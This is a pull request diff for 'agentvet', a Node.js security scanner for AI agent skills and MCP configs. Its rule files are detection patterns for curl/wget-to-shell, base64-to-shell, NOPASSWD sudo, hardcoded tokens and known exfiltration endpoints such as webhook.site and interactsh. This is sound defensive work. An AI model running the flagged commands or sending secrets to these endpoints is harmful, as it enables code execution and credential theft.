### PR TITLE
feat: initial implementation of agentvet CLI

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,0 +1,31 @@
+# Dependencies
+node_modules/
+
+# Build output
+dist/
+build/
+
+# Test coverage
+coverage/
+
+# IDE
+.idea/
+.vscode/
+*.swp
+*.swo
+
+# OS
+.DS_Store
+Thumbs.db
+
+# Logs
+*.log
+npm-debug.log*
+
+# Environment
+.env
+.env.local
+.env.*.local
+
+# Test artifacts
+test-results/

--- a/LICENSE
+++ b/LICENSE
@@ -1,0 +1,21 @@
+MIT License
+
+Copyright (c) 2026 AgentVet Contributors
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

--- a/bin/agentvet.js
+++ b/bin/agentvet.js
@@ -1,0 +1,155 @@
+#!/usr/bin/env node
+/**
+ * AgentVet CLI
+ * Security scanner for AI agent skills, configs, and MCP tools
+ */
+
+const { scan } = require('../src/index.js');
+const { printReport, printJSON, printQuiet } = require('../src/reporter.js');
+
+const VERSION = require('../package.json').version;
+
+const HELP = `
+AgentVet v${VERSION}
+Security scanner for AI agent skills, configs, and MCP tools.
+
+Usage:
+  agentvet scan <path>    Scan a directory or file
+  agentvet --help         Show this help message
+  agentvet --version      Show version
+
+Options:
+  --format <type>   Output format: text (default), json
+  --output <file>   Write output to file
+  --quiet           Show summary only
+  --fix             Auto-fix permission issues
+  --severity <lvl>  Minimum severity to report: critical, warning, info (default: info)
+
+Examples:
+  agentvet scan ./skills
+  agentvet scan . --format json --output report.json
+  agentvet scan ~/agent-config --quiet
+  agentvet scan . --fix
+
+Exit codes:
+  0 - No critical issues found
+  1 - Critical issues found
+`;
+
+function parseArgs(args) {
+  const options = {
+    command: null,
+    path: '.',
+    format: 'text',
+    output: null,
+    quiet: false,
+    fix: false,
+    severity: 'info',
+  };
+
+  let i = 0;
+  while (i < args.length) {
+    const arg = args[i];
+    
+    switch (arg) {
+      case 'scan':
+        options.command = 'scan';
+        if (args[i + 1] && !args[i + 1].startsWith('-')) {
+          options.path = args[++i];
+        }
+        break;
+      case '--help':
+      case '-h':
+        options.command = 'help';
+        break;
+      case '--version':
+      case '-v':
+        options.command = 'version';
+        break;
+      case '--format':
+      case '-f':
+        options.format = args[++i] || 'text';
+        break;
+      case '--output':
+      case '-o':
+        options.output = args[++i];
+        break;
+      case '--quiet':
+      case '-q':
+        options.quiet = true;
+        break;
+      case '--fix':
+        options.fix = true;
+        break;
+      case '--severity':
+      case '-s':
+        options.severity = args[++i] || 'info';
+        break;
+      default:
+        if (!options.command && !arg.startsWith('-')) {
+          // Treat as path if no command yet
+          options.command = 'scan';
+          options.path = arg;
+        }
+    }
+    i++;
+  }
+
+  return options;
+}
+
+async function main() {
+  const args = process.argv.slice(2);
+  const options = parseArgs(args);
+
+  // Handle help and version
+  if (options.command === 'help' || args.length === 0) {
+    console.log(HELP);
+    process.exit(0);
+  }
+
+  if (options.command === 'version') {
+    console.log(`agentvet v${VERSION}`);
+    process.exit(0);
+  }
+
+  // Run scan
+  if (options.command === 'scan') {
+    try {
+      const results = await scan(options.path, {
+        fix: options.fix,
+        severityFilter: options.severity,
+      });
+
+      // Output results
+      let output;
+      if (options.format === 'json') {
+        output = printJSON(results);
+      } else if (options.quiet) {
+        output = printQuiet(results);
+      } else {
+        output = printReport(results, options.path);
+      }
+
+      // Write to file or stdout
+      if (options.output) {
+        require('fs').writeFileSync(options.output, output);
+        console.log(`Report written to ${options.output}`);
+      } else {
+        console.log(output);
+      }
+
+      // Exit code based on critical findings
+      process.exit(results.summary.critical > 0 ? 1 : 0);
+    } catch (error) {
+      console.error(`Error: ${error.message}`);
+      process.exit(2);
+    }
+  }
+
+  // Unknown command
+  console.error('Unknown command. Use --help for usage.');
+  process.exit(1);
+}
+
+main();

--- a/package.json
+++ b/package.json
@@ -1,0 +1,44 @@
+{
+  "name": "agentvet",
+  "version": "0.1.0",
+  "description": "Security scanner for AI agent skills, configs, and MCP tools. Vet before you trust.",
+  "main": "src/index.js",
+  "bin": {
+    "agentvet": "./bin/agentvet.js"
+  },
+  "scripts": {
+    "test": "node --test test/*.test.js",
+    "lint": "eslint src bin",
+    "scan": "node bin/agentvet.js scan ."
+  },
+  "keywords": [
+    "security",
+    "ai-agent",
+    "scanner",
+    "mcp",
+    "skills",
+    "clawdbot",
+    "claude-code",
+    "devin",
+    "supply-chain"
+  ],
+  "author": "AgentVet Contributors",
+  "license": "MIT",
+  "repository": {
+    "type": "git",
+    "url": "git+https://github.com/taku-tez/agentvet.git"
+  },
+  "bugs": {
+    "url": "https://github.com/taku-tez/agentvet/issues"
+  },
+  "homepage": "https://github.com/taku-tez/agentvet#readme",
+  "engines": {
+    "node": ">=18.0.0"
+  },
+  "files": [
+    "bin",
+    "src",
+    "README.md",
+    "LICENSE"
+  ]
+}

--- a/src/index.js
+++ b/src/index.js
@@ -1,0 +1,41 @@
+/**
+ * AgentVet - Main Entry Point
+ * Security scanner for AI agent skills, configs, and MCP tools
+ */
+
+const { Scanner } = require('./scanner.js');
+
+/**
+ * Scan a directory or file for security issues
+ * @param {string} targetPath - Path to scan
+ * @param {Object} options - Scan options
+ * @returns {Object} Scan results
+ */
+async function scan(targetPath, options = {}) {
+  const scanner = new Scanner(options);
+  return scanner.scan(targetPath);
+}
+
+/**
+ * Get the default rules
+ * @returns {Array} Array of rule definitions
+ */
+function getRules() {
+  const credentials = require('./rules/credentials.js');
+  const commands = require('./rules/commands.js');
+  const urls = require('./rules/urls.js');
+  const permissions = require('./rules/permissions.js');
+  
+  return [
+    ...credentials.rules,
+    ...commands.rules,
+    ...urls.rules,
+    ...permissions.rules,
+  ];
+}
+
+module.exports = {
+  scan,
+  getRules,
+  Scanner,
+};

--- a/src/reporter.js
+++ b/src/reporter.js
@@ -1,0 +1,161 @@
+/**
+ * AgentVet Reporter
+ * Output formatting for scan results
+ */
+
+// ANSI color codes
+const colors = {
+  red: (s) => `\x1b[31m${s}\x1b[0m`,
+  green: (s) => `\x1b[32m${s}\x1b[0m`,
+  yellow: (s) => `\x1b[33m${s}\x1b[0m`,
+  blue: (s) => `\x1b[34m${s}\x1b[0m`,
+  gray: (s) => `\x1b[90m${s}\x1b[0m`,
+  bold: (s) => `\x1b[1m${s}\x1b[0m`,
+  dim: (s) => `\x1b[2m${s}\x1b[0m`,
+};
+
+// Severity icons
+const icons = {
+  critical: '🔴',
+  warning: '🟡',
+  info: '🔵',
+};
+
+/**
+ * Print human-readable report
+ */
+function printReport(results, targetPath) {
+  const lines = [];
+  
+  lines.push('');
+  lines.push(colors.bold('🛡️  AgentVet Security Scan Report'));
+  lines.push('═'.repeat(50));
+  lines.push(`Target: ${targetPath}`);
+  lines.push(`Scanned: ${results.scannedFiles} files`);
+  lines.push(`Date: ${new Date().toISOString()}`);
+  lines.push('');
+
+  // Group findings by severity
+  const critical = results.findings.filter(f => f.severity === 'critical');
+  const warning = results.findings.filter(f => f.severity === 'warning');
+  const info = results.findings.filter(f => f.severity === 'info');
+
+  // Critical findings
+  if (critical.length > 0) {
+    lines.push(colors.red(colors.bold(`${icons.critical} CRITICAL (${critical.length})`)));
+    lines.push('');
+    for (const finding of critical) {
+      lines.push(formatFinding(finding, colors.red));
+    }
+    lines.push('');
+  }
+
+  // Warning findings
+  if (warning.length > 0) {
+    lines.push(colors.yellow(colors.bold(`${icons.warning} WARNING (${warning.length})`)));
+    lines.push('');
+    for (const finding of warning) {
+      lines.push(formatFinding(finding, colors.yellow));
+    }
+    lines.push('');
+  }
+
+  // Info findings
+  if (info.length > 0) {
+    lines.push(colors.blue(colors.bold(`${icons.info} INFO (${info.length})`)));
+    lines.push('');
+    for (const finding of info) {
+      lines.push(formatFinding(finding, colors.blue));
+    }
+    lines.push('');
+  }
+
+  // Summary
+  lines.push('─'.repeat(50));
+  if (results.summary.total === 0) {
+    lines.push(colors.green(colors.bold('✅ No security issues found!')));
+  } else {
+    lines.push(colors.bold('📊 Summary'));
+    if (results.summary.critical > 0) {
+      lines.push(colors.red(`   ${icons.critical} Critical: ${results.summary.critical}`));
+    }
+    if (results.summary.warning > 0) {
+      lines.push(colors.yellow(`   ${icons.warning} Warning: ${results.summary.warning}`));
+    }
+    if (results.summary.info > 0) {
+      lines.push(colors.blue(`   ${icons.info} Info: ${results.summary.info}`));
+    }
+  }
+
+  // Fixed issues
+  if (results.fixedIssues > 0) {
+    lines.push('');
+    lines.push(colors.green(`🔧 Auto-fixed ${results.fixedIssues} permission issues`));
+  }
+
+  lines.push('');
+
+  return lines.join('\n');
+}
+
+/**
+ * Format a single finding
+ */
+function formatFinding(finding, colorFn) {
+  const lines = [];
+  const location = finding.line > 0 
+    ? `${finding.file}:${finding.line}` 
+    : finding.file;
+  
+  lines.push(`  ${colorFn('●')} ${finding.description}`);
+  lines.push(colors.dim(`    ${location}`));
+  
+  if (finding.snippet) {
+    lines.push(colors.gray(`    ${finding.snippet}`));
+  }
+  
+  if (finding.recommendation) {
+    lines.push(colors.dim(`    💡 ${finding.recommendation}`));
+  }
+  
+  if (finding.fixed) {
+    lines.push(colors.green(`    ✅ Fixed`));
+  }
+  
+  lines.push('');
+  
+  return lines.join('\n');
+}
+
+/**
+ * Print JSON output
+ */
+function printJSON(results) {
+  return JSON.stringify(results, null, 2);
+}
+
+/**
+ * Print quiet summary
+ */
+function printQuiet(results) {
+  const { summary } = results;
+  
+  if (summary.total === 0) {
+    return '✅ No issues found';
+  }
+  
+  const parts = [];
+  if (summary.critical > 0) parts.push(`${icons.critical} ${summary.critical} critical`);
+  if (summary.warning > 0) parts.push(`${icons.warning} ${summary.warning} warning`);
+  if (summary.info > 0) parts.push(`${icons.info} ${summary.info} info`);
+  
+  const status = summary.critical > 0 ? '❌' : '⚠️';
+  return `${status} ${parts.join(', ')}`;
+}
+
+module.exports = {
+  printReport,
+  printJSON,
+  printQuiet,
+  colors,
+};

--- a/src/rules/commands.js
+++ b/src/rules/commands.js
@@ -1,0 +1,79 @@
+/**
+ * Dangerous Command Detection Rules
+ * Detects potentially dangerous shell commands and code patterns
+ */
+
+const rules = [
+  {
+    id: 'command-rm-rf',
+    severity: 'warning',
+    description: 'Dangerous rm -rf command with root or home path',
+    pattern: /rm\s+(?:-[a-zA-Z]*r[a-zA-Z]*f[a-zA-Z]*|-[a-zA-Z]*f[a-zA-Z]*r[a-zA-Z]*)\s+[\/~]/g,
+    recommendation: 'Avoid recursive force delete on system paths. Use safer alternatives like trash-cli.',
+  },
+  {
+    id: 'command-curl-bash',
+    severity: 'critical',
+    description: 'Curl piped to shell execution detected',
+    pattern: /curl\s+[^|]*\|\s*(?:ba)?sh/gi,
+    recommendation: 'Download scripts first, review them, then execute. Never pipe directly to shell.',
+  },
+  {
+    id: 'command-wget-bash',
+    severity: 'critical',
+    description: 'Wget piped to shell execution detected',
+    pattern: /wget\s+[^|]*\|\s*(?:ba)?sh/gi,
+    recommendation: 'Download scripts first, review them, then execute.',
+  },
+  {
+    id: 'command-eval',
+    severity: 'warning',
+    description: 'Use of eval() detected',
+    pattern: /\beval\s*\([^)]*[\$`]/g,
+    recommendation: 'Avoid eval() with dynamic input. It can lead to code injection.',
+  },
+  {
+    id: 'command-exec-variable',
+    severity: 'warning',
+    description: 'exec() with variable input detected',
+    pattern: /\bexec\s*\([^)]*[\$`{]/g,
+    recommendation: 'Sanitize input before passing to exec(). Consider using safer alternatives.',
+  },
+  {
+    id: 'command-chmod-777',
+    severity: 'warning',
+    description: 'chmod 777 (world-writable) detected',
+    pattern: /chmod\s+(?:777|\+rwx|a\+rwx)/g,
+    recommendation: 'Avoid world-writable permissions. Use minimal required permissions.',
+  },
+  {
+    id: 'command-sudo-nopasswd',
+    severity: 'critical',
+    description: 'NOPASSWD sudo configuration detected',
+    pattern: /NOPASSWD/g,
+    recommendation: 'Avoid NOPASSWD in sudo configurations. Require password for security.',
+  },
+  {
+    id: 'command-base64-decode',
+    severity: 'info',
+    description: 'Base64 decode piped to execution',
+    pattern: /base64\s+(?:-d|--decode)[^|]*\|\s*(?:ba)?sh/gi,
+    recommendation: 'Review base64-encoded content before execution. This is often used to obfuscate malicious code.',
+  },
+  {
+    id: 'command-python-exec',
+    severity: 'warning',
+    description: 'Python exec() or compile() with dynamic input',
+    pattern: /(?:exec|compile)\s*\([^)]*(?:input|request|argv|environ)/gi,
+    recommendation: 'Avoid executing dynamic code from user input.',
+  },
+  {
+    id: 'command-shell-injection',
+    severity: 'warning',
+    description: 'Potential shell injection pattern',
+    pattern: /(?:subprocess|os\.system|os\.popen|commands\.getoutput)\s*\([^)]*(?:\+|%|format|f['"])/gi,
+    recommendation: 'Use parameterized commands or shlex.quote() to prevent shell injection.',
+  },
+];
+
+module.exports = { rules };

--- a/src/rules/credentials.js
+++ b/src/rules/credentials.js
@@ -1,0 +1,100 @@
+/**
+ * Credential Detection Rules
+ * Detects hardcoded API keys, tokens, and secrets
+ */
+
+const rules = [
+  {
+    id: 'credential-aws-key',
+    severity: 'critical',
+    description: 'AWS Access Key ID detected',
+    pattern: /AKIA[0-9A-Z]{16}/g,
+    recommendation: 'Use environment variables or AWS credentials file (~/.aws/credentials)',
+  },
+  {
+    id: 'credential-aws-secret',
+    severity: 'critical',
+    description: 'Potential AWS Secret Access Key detected',
+    pattern: /(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])/g,
+    recommendation: 'Use environment variables or AWS credentials file',
+  },
+  {
+    id: 'credential-github-token',
+    severity: 'critical',
+    description: 'GitHub token detected',
+    pattern: /gh[pousr]_[A-Za-z0-9_]{36,}/g,
+    recommendation: 'Use environment variables or GitHub CLI authentication',
+  },
+  {
+    id: 'credential-github-pat',
+    severity: 'critical',
+    description: 'GitHub Personal Access Token detected',
+    pattern: /github_pat_[A-Za-z0-9_]{22,}/g,
+    recommendation: 'Use environment variables or GitHub CLI authentication',
+  },
+  {
+    id: 'credential-slack-token',
+    severity: 'critical',
+    description: 'Slack token detected',
+    pattern: /xox[baprs]-[0-9A-Za-z-]{10,}/g,
+    recommendation: 'Use environment variables or Slack app configuration',
+  },
+  {
+    id: 'credential-openai-key',
+    severity: 'critical',
+    description: 'OpenAI API key detected',
+    pattern: /sk-[A-Za-z0-9]{32,}/g,
+    recommendation: 'Use environment variables (OPENAI_API_KEY)',
+  },
+  {
+    id: 'credential-anthropic-key',
+    severity: 'critical',
+    description: 'Anthropic API key detected',
+    pattern: /sk-ant-[A-Za-z0-9-]{32,}/g,
+    recommendation: 'Use environment variables (ANTHROPIC_API_KEY)',
+  },
+  {
+    id: 'credential-private-key',
+    severity: 'critical',
+    description: 'Private key detected',
+    pattern: /-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----/g,
+    recommendation: 'Never commit private keys. Use secure key management.',
+  },
+  {
+    id: 'credential-generic-api-key',
+    severity: 'warning',
+    description: 'Potential hardcoded API key',
+    pattern: /['"]?(?:api[_-]?key|apikey)['"]?\s*[:=]\s*['"][a-zA-Z0-9_-]{20,}['"]/gi,
+    recommendation: 'Use environment variables for API keys',
+  },
+  {
+    id: 'credential-generic-secret',
+    severity: 'warning',
+    description: 'Potential hardcoded secret or password',
+    pattern: /['"]?(?:secret|password|passwd|pwd)['"]?\s*[:=]\s*['"][^'"]{8,}['"]/gi,
+    recommendation: 'Use environment variables or a secrets manager',
+  },
+  {
+    id: 'credential-bearer-token',
+    severity: 'warning',
+    description: 'Bearer token in code',
+    pattern: /['"]Bearer\s+[A-Za-z0-9._-]{20,}['"]/g,
+    recommendation: 'Use environment variables for authentication tokens',
+  },
+  {
+    id: 'credential-notion-token',
+    severity: 'critical',
+    description: 'Notion API token detected',
+    pattern: /(?:ntn_|secret_)[A-Za-z0-9]{32,}/g,
+    recommendation: 'Use environment variables or secure configuration',
+  },
+  {
+    id: 'credential-discord-token',
+    severity: 'critical',
+    description: 'Discord bot token detected',
+    pattern: /[MN][A-Za-z\d]{23,}\.[\w-]{6}\.[\w-]{27,}/g,
+    recommendation: 'Use environment variables (DISCORD_TOKEN)',
+  },
+];
+
+module.exports = { rules };

--- a/src/rules/index.js
+++ b/src/rules/index.js
@@ -1,0 +1,24 @@
+/**
+ * AgentVet Rules Index
+ * Exports all rule modules
+ */
+
+const credentials = require('./credentials.js');
+const commands = require('./commands.js');
+const urls = require('./urls.js');
+const permissions = require('./permissions.js');
+
+module.exports = {
+  credentials,
+  commands,
+  urls,
+  permissions,
+  
+  // Combined rules array
+  all: [
+    ...credentials.rules,
+    ...commands.rules,
+    ...urls.rules,
+    ...permissions.rules,
+  ],
+};

--- a/src/rules/permissions.js
+++ b/src/rules/permissions.js
@@ -1,0 +1,29 @@
+/**
+ * File Permission Rules
+ * Checks for insecure file permissions on sensitive files
+ */
+
+const rules = [
+  {
+    id: 'permission-sensitive-files',
+    severity: 'warning',
+    description: 'Sensitive file has insecure permissions',
+    patterns: [
+      '.env',
+      'api_key',
+      'credentials.json',
+      'secrets.json',
+      'config.json',
+      '.pem',
+      '.key',
+      'id_rsa',
+      'id_ed25519',
+      'id_ecdsa',
+      '.p12',
+      '.pfx',
+    ],
+    recommendation: 'Set file permissions to 600 (owner read/write only): chmod 600 <file>',
+  },
+];
+
+module.exports = { rules };

--- a/src/rules/urls.js
+++ b/src/rules/urls.js
@@ -1,0 +1,93 @@
+/**
+ * Suspicious URL Detection Rules
+ * Detects URLs commonly used for data exfiltration
+ */
+
+const rules = [
+  {
+    id: 'url-webhook-site',
+    severity: 'critical',
+    description: 'webhook.site URL detected (common exfiltration endpoint)',
+    pattern: /https?:\/\/webhook\.site\/[a-zA-Z0-9-]+/gi,
+    recommendation: 'Remove webhook.site URLs. This service is commonly used for data exfiltration.',
+  },
+  {
+    id: 'url-ngrok',
+    severity: 'critical',
+    description: 'ngrok tunnel URL detected',
+    pattern: /https?:\/\/[a-z0-9-]+\.ngrok(?:-free)?\.(?:io|app|dev)/gi,
+    recommendation: 'ngrok URLs can expose local services. Ensure this is intentional and not malicious.',
+  },
+  {
+    id: 'url-pastebin',
+    severity: 'warning',
+    description: 'Pastebin URL detected',
+    pattern: /https?:\/\/(?:www\.)?pastebin\.com\/(?:raw\/)?[a-zA-Z0-9]+/gi,
+    recommendation: 'Review pastebin content. It may contain malicious payloads.',
+  },
+  {
+    id: 'url-requestbin',
+    severity: 'critical',
+    description: 'RequestBin URL detected (data collection service)',
+    pattern: /https?:\/\/(?:[a-z0-9]+\.)?requestbin\.(?:com|net|io)/gi,
+    recommendation: 'Remove RequestBin URLs. This service is used for data collection.',
+  },
+  {
+    id: 'url-pipedream',
+    severity: 'warning',
+    description: 'Pipedream URL detected',
+    pattern: /https?:\/\/[a-z0-9-]+\.m\.pipedream\.net/gi,
+    recommendation: 'Review Pipedream webhook usage. Ensure it is not used for data exfiltration.',
+  },
+  {
+    id: 'url-burp-collaborator',
+    severity: 'critical',
+    description: 'Burp Collaborator URL detected (security testing tool)',
+    pattern: /https?:\/\/[a-z0-9]+\.burpcollaborator\.net/gi,
+    recommendation: 'Remove Burp Collaborator URLs. This indicates security testing or potential attack.',
+  },
+  {
+    id: 'url-interactsh',
+    severity: 'critical',
+    description: 'Interactsh URL detected (OOB testing tool)',
+    pattern: /https?:\/\/[a-z0-9]+\.(?:oast\.pro|oast\.live|oast\.site|oast\.online|oast\.fun|oast\.me|interact\.sh)/gi,
+    recommendation: 'Remove Interactsh URLs. This is an out-of-band testing tool often used in attacks.',
+  },
+  {
+    id: 'url-discord-webhook',
+    severity: 'warning',
+    description: 'Discord webhook URL detected',
+    pattern: /https?:\/\/(?:ptb\.|canary\.)?discord(?:app)?\.com\/api\/webhooks\/[0-9]+\/[A-Za-z0-9_-]+/gi,
+    recommendation: 'Ensure Discord webhooks are not used for data exfiltration. Keep webhook URLs secret.',
+  },
+  {
+    id: 'url-telegram-bot',
+    severity: 'warning',
+    description: 'Telegram Bot API URL detected',
+    pattern: /https?:\/\/api\.telegram\.org\/bot[0-9]+:[A-Za-z0-9_-]+/gi,
+    recommendation: 'Ensure Telegram bot tokens are not exposed. Review bot usage.',
+  },
+  {
+    id: 'url-postbin',
+    severity: 'critical',
+    description: 'Postbin URL detected (data collection service)',
+    pattern: /https?:\/\/(?:www\.)?postb\.in\/[a-zA-Z0-9]+/gi,
+    recommendation: 'Remove Postbin URLs. This service is used for data collection.',
+  },
+  {
+    id: 'url-beeceptor',
+    severity: 'warning',
+    description: 'Beeceptor mock API URL detected',
+    pattern: /https?:\/\/[a-z0-9-]+\.free\.beeceptor\.com/gi,
+    recommendation: 'Review Beeceptor usage. Ensure it is not used for data exfiltration.',
+  },
+  {
+    id: 'url-hookbin',
+    severity: 'critical',
+    description: 'Hookbin URL detected (webhook testing)',
+    pattern: /https?:\/\/hookbin\.com\/[a-zA-Z0-9]+/gi,
+    recommendation: 'Remove Hookbin URLs. This service is used for webhook testing and data collection.',
+  },
+];
+
+module.exports = { rules };

--- a/src/scanner.js
+++ b/src/scanner.js
@@ -1,0 +1,354 @@
+/**
+ * AgentVet Scanner
+ * Core scanning logic
+ */
+
+const fs = require('fs');
+const path = require('path');
+
+// Import rules
+const credentials = require('./rules/credentials.js');
+const commands = require('./rules/commands.js');
+const urls = require('./rules/urls.js');
+const permissions = require('./rules/permissions.js');
+
+// Files to always scan
+const PRIORITY_FILES = [
+  'SKILL.md',
+  'skill.md',
+  'AGENTS.md',
+  'agents.md',
+  'mcp.json',
+  'mcp-config.json',
+  '.env',
+  'config.json',
+  'settings.json',
+];
+
+// Binary extensions to skip
+const BINARY_EXTENSIONS = [
+  '.jpg', '.jpeg', '.png', '.gif', '.webp', '.ico',
+  '.pdf', '.doc', '.docx',
+  '.zip', '.tar', '.gz', '.rar', '.7z',
+  '.exe', '.bin', '.dll', '.so', '.dylib',
+  '.mp3', '.mp4', '.wav', '.avi', '.mov',
+  '.woff', '.woff2', '.ttf', '.eot',
+];
+
+// Directories to exclude
+const EXCLUDE_DIRS = [
+  'node_modules',
+  '.git',
+  '.cache',
+  '.npm',
+  '__pycache__',
+  'venv',
+  '.venv',
+  'dist',
+  'build',
+  'coverage',
+];
+
+// Files to exclude
+const EXCLUDE_FILES = [
+  'package-lock.json',
+  'yarn.lock',
+  'pnpm-lock.yaml',
+];
+
+class Scanner {
+  constructor(options = {}) {
+    this.options = {
+      fix: false,
+      severityFilter: 'info',
+      maxFileSize: 1024 * 1024, // 1MB
+      checkPermissions: true,
+      ...options,
+    };
+    
+    this.results = {
+      findings: [],
+      summary: {
+        total: 0,
+        critical: 0,
+        warning: 0,
+        info: 0,
+      },
+      scannedFiles: 0,
+      fixedIssues: 0,
+    };
+    
+    this.rules = [
+      ...credentials.rules,
+      ...commands.rules,
+      ...urls.rules,
+    ];
+  }
+
+  /**
+   * Scan a path (file or directory)
+   */
+  async scan(targetPath) {
+    const resolvedPath = path.resolve(targetPath.replace(/^~/, process.env.HOME || ''));
+    
+    if (!fs.existsSync(resolvedPath)) {
+      throw new Error(`Path not found: ${resolvedPath}`);
+    }
+    
+    const stat = fs.statSync(resolvedPath);
+    
+    if (stat.isFile()) {
+      this.scanFile(resolvedPath);
+    } else if (stat.isDirectory()) {
+      this.walkDirectory(resolvedPath);
+    }
+    
+    // Check file permissions for sensitive files
+    if (this.options.checkPermissions) {
+      this.checkPermissions();
+    }
+    
+    // Auto-fix if requested
+    if (this.options.fix) {
+      this.autoFix();
+    }
+    
+    return this.results;
+  }
+
+  /**
+   * Walk directory recursively
+   */
+  walkDirectory(dirPath) {
+    let entries;
+    try {
+      entries = fs.readdirSync(dirPath);
+    } catch (e) {
+      return; // Skip inaccessible directories
+    }
+    
+    for (const entry of entries) {
+      const fullPath = path.join(dirPath, entry);
+      
+      // Skip excluded directories
+      if (EXCLUDE_DIRS.includes(entry)) continue;
+      
+      // Skip excluded files
+      if (EXCLUDE_FILES.includes(entry)) continue;
+      
+      try {
+        const stat = fs.statSync(fullPath);
+        
+        if (stat.isDirectory()) {
+          this.walkDirectory(fullPath);
+        } else if (stat.isFile()) {
+          this.scanFile(fullPath);
+        }
+      } catch (e) {
+        // Skip files we can't access
+      }
+    }
+  }
+
+  /**
+   * Scan a single file
+   */
+  scanFile(filePath) {
+    const ext = path.extname(filePath).toLowerCase();
+    const basename = path.basename(filePath);
+    
+    // Skip binary files
+    if (BINARY_EXTENSIONS.includes(ext)) return;
+    
+    // Skip self
+    if (basename === 'agentvet.js') return;
+    
+    // Check file size
+    try {
+      const stat = fs.statSync(filePath);
+      if (stat.size > this.options.maxFileSize) return;
+    } catch (e) {
+      return;
+    }
+    
+    // Read file content
+    let content;
+    try {
+      content = fs.readFileSync(filePath, 'utf8');
+    } catch (e) {
+      return; // Skip unreadable files
+    }
+    
+    this.results.scannedFiles++;
+    
+    // Apply each rule
+    for (const rule of this.rules) {
+      this.applyRule(rule, filePath, content);
+    }
+  }
+
+  /**
+   * Apply a single rule to file content
+   */
+  applyRule(rule, filePath, content) {
+    // Skip if severity doesn't match filter
+    const severityOrder = { critical: 0, warning: 1, info: 2 };
+    const filterLevel = severityOrder[this.options.severityFilter] ?? 2;
+    const ruleLevel = severityOrder[rule.severity] ?? 2;
+    if (ruleLevel > filterLevel) return;
+    
+    // Reset regex lastIndex
+    rule.pattern.lastIndex = 0;
+    
+    const lines = content.split('\n');
+    let match;
+    
+    while ((match = rule.pattern.exec(content)) !== null) {
+      const lineNum = content.substring(0, match.index).split('\n').length;
+      const lineContent = lines[lineNum - 1] || '';
+      
+      // Create finding
+      const finding = {
+        ruleId: rule.id,
+        severity: rule.severity,
+        description: rule.description,
+        file: filePath,
+        line: lineNum,
+        column: match.index - content.lastIndexOf('\n', match.index - 1),
+        snippet: this.sanitizeSnippet(match[0], rule),
+        lineContent: lineContent.trim().substring(0, 100),
+        recommendation: rule.recommendation,
+      };
+      
+      this.results.findings.push(finding);
+      this.results.summary[rule.severity]++;
+      this.results.summary.total++;
+      
+      // Prevent infinite loop for zero-width matches
+      if (match.index === rule.pattern.lastIndex) {
+        rule.pattern.lastIndex++;
+      }
+    }
+  }
+
+  /**
+   * Sanitize snippet (mask sensitive data)
+   */
+  sanitizeSnippet(snippet, rule) {
+    // For credential rules, mask the actual value
+    if (rule.id.startsWith('credential-')) {
+      if (snippet.length > 20) {
+        return snippet.substring(0, 10) + '***' + snippet.substring(snippet.length - 4);
+      }
+    }
+    
+    // Truncate long snippets
+    if (snippet.length > 60) {
+      return snippet.substring(0, 57) + '...';
+    }
+    
+    return snippet;
+  }
+
+  /**
+   * Check file permissions for sensitive files
+   */
+  checkPermissions() {
+    const sensitivePatterns = [
+      '.env',
+      'api_key',
+      'credentials.json',
+      'secrets.json',
+      '.pem',
+      '.key',
+    ];
+    
+    const homeDir = process.env.HOME || '';
+    const configDirs = [
+      path.join(homeDir, '.config'),
+      path.join(homeDir, '.clawdbot'),
+    ];
+    
+    for (const rule of permissions.rules) {
+      // Check common sensitive file locations
+      for (const configDir of configDirs) {
+        if (!fs.existsSync(configDir)) continue;
+        
+        this.walkForPermissions(configDir, rule);
+      }
+    }
+  }
+
+  /**
+   * Walk directory checking permissions
+   */
+  walkForPermissions(dirPath, rule) {
+    let entries;
+    try {
+      entries = fs.readdirSync(dirPath);
+    } catch (e) {
+      return;
+    }
+    
+    for (const entry of entries) {
+      const fullPath = path.join(dirPath, entry);
+      
+      try {
+        const stat = fs.statSync(fullPath);
+        
+        if (stat.isDirectory()) {
+          this.walkForPermissions(fullPath, rule);
+        } else if (stat.isFile()) {
+          // Check if file matches sensitive patterns
+          const isSensitive = rule.patterns.some(p => 
+            entry.includes(p) || entry.endsWith(p)
+          );
+          
+          if (isSensitive) {
+            const mode = (stat.mode & 0o777).toString(8);
+            
+            // Check if permissions are too open
+            if (mode !== '600' && mode !== '400') {
+              const finding = {
+                ruleId: rule.id,
+                severity: mode.charAt(2) !== '0' ? 'critical' : 'warning',
+                description: rule.description,
+                file: fullPath,
+                line: 0,
+                snippet: `Current: ${mode}, Recommended: 600`,
+                recommendation: rule.recommendation,
+                fixable: true,
+                currentMode: mode,
+              };
+              
+              this.results.findings.push(finding);
+              this.results.summary[finding.severity]++;
+              this.results.summary.total++;
+            }
+          }
+        }
+      } catch (e) {
+        // Skip inaccessible files
+      }
+    }
+  }
+
+  /**
+   * Auto-fix permission issues
+   */
+  autoFix() {
+    for (const finding of this.results.findings) {
+      if (finding.fixable && finding.ruleId === 'permission-sensitive-files') {
+        try {
+          fs.chmodSync(finding.file, 0o600);
+          this.results.fixedIssues++;
+          finding.fixed = true;
+        } catch (e) {
+          finding.fixError = e.message;
+        }
+      }
+    }
+  }
+}
+
+module.exports = { Scanner };

--- a/test/scanner.test.js
+++ b/test/scanner.test.js
@@ -1,0 +1,178 @@
+/**
+ * AgentVet Scanner Tests
+ */
+
+const { test, describe } = require('node:test');
+const assert = require('node:assert');
